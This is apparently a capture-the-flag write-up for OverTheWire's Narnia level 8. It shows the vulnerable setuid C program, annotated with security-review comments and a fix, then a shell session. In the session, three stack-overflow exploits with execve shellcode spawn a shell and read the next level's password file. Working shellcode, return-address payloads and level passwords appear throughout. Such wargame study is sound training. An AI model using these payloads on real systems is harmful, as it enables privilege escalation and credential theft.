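# Narnia wargame: Level 8

The level's source, listed below, copies its first command-line argument into a 20-byte stack buffer with a loop that stops only at the argument's terminating NUL, so the weakness is a stack-based buffer overflow (CWE-121) in a setuid binary. The fix is a bound on that copy; compiler and OS hardening (stack protector, non-executable stack, ASLR) limits the impact of such a bug but does not remove it.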


# ssh narnia8@narnia.labs.overthewire.org
narnia8@narnia.labs.overthewire.org's password:6d6f6874687570686f67

narnia8@melissa$ file /narnia/narnia8
/narnia/narnia8: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia8@melissa$ cat /narnia/narnia8.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global until i find a fix
// -morla
//
// NOTE(review): `i` is the loop index used by func() below. Declared at file
// scope it is not stored in func()'s stack frame; presumably this keeps the
// index itself from being overwritten when the copy runs past `bok`
// (confirm against the build). As a side effect func() is not reentrant.
int i;

/*
 * Copy the NUL-terminated string `b` into a 20-byte stack buffer, one byte
 * at a time, then print the buffer.
 *
 * Security review: the copy loop is bounded only by the terminator of the
 * source string, never by sizeof(bok). Any argument of 20 bytes or more
 * writes past the end of `bok` (stack-based buffer overflow, CWE-121), and
 * an argument of exactly 20 bytes leaves `bok` without a terminator for the
 * printf() below. `b` comes straight from argv[1] in main(), so the length
 * is fully caller-controlled.
 *
 * The loop re-reads the source through the local pointer `blah` on every
 * iteration. `blah` is a stack local like `bok`; if the compiler places it
 * above `bok`, the overflow rewrites the source pointer mid-copy. The
 * walkthrough's inputs are consistent with that layout on this build;
 * the layout is not guaranteed by the C source.
 *
 * Remediation: bound the copy, e.g. `i < (int)sizeof(bok) - 1` in the loop
 * condition, or replace the loop with snprintf(bok, sizeof bok, "%s", b).
 */
void func(char *b){
        char *blah=b;   /* source pointer, re-read on every loop iteration */
        char bok[20];   /* fixed-size destination on the stack */
        /* original local loop index, disabled in favour of the global `i` */
        //int i=0;

        /* zero-fill so a short copy is always NUL-terminated */
        memset(bok, '\0', sizeof(bok));
        /* no check of i against sizeof(bok): writes out of bounds once i reaches 20 */
        for(i=0; blah[i] != '\0'; i++)
                bok[i]=blah[i];

        /* reads until the first NUL byte, which may lie beyond bok after an overflow */
        printf("%s\n",bok);
}

/*
 * Entry point: with at least one command-line argument, hand the first one
 * to func(); otherwise print the program name followed by " argument".
 * Always returns 0.
 */
int main(int argc, char **argv){
        /* No argument supplied: print the usage-style line and stop. */
        if(argc <= 1){
                printf("%s argument\n", argv[0]);
                return 0;
        }

        /* argv[1] is passed on as-is; its length is not checked here. */
        func(argv[1]);
        return 0;
}
narnia8@melissa$ mkdir /tmp/n8
narnia8@melissa$ cd /tmp/n8
narnia8@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
narnia8@melissa$ ./getenvaddr EGG /narnia/narnia8
EGG will be at 0xffffd97d
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "A"x20 . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\x7d\xd9\xff\xff"'`
AAAAAAAAAAAAAAAAAAAAëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa:/tmp/n8$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xeb\x04" . "\xeb\xd8\xff\xff" . "\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1À°                     ÿÿëØÿÿëØÿÿíþ÷
   Rh//shh/binãëëØÿÿRâSáÍ           ô/ý÷


$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
$ exit
narnia8@melissa$ ln -s /bin/sh sh
narnia8@melissa$ /narnia/narnia8 `perl -e 'print "\x31\xc0\x50\x68\x2e\x2f\x73\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xeb\xd8\xff\xff" . "A"x8 . "\x8d\x7f\xff\xff" . "\xeb\xd8\xff\xff"'`
1ÀPh./shãPâSá°            ÿÿëØÿÿëØÿÿíþ÷
              ÍëØÿÿAAAAAAAA           ô/ý÷

$ /usr/bin/whoami
narnia9
$ /bin/cat /etc/narnia_pass/narnia9
65694c356665616c6165
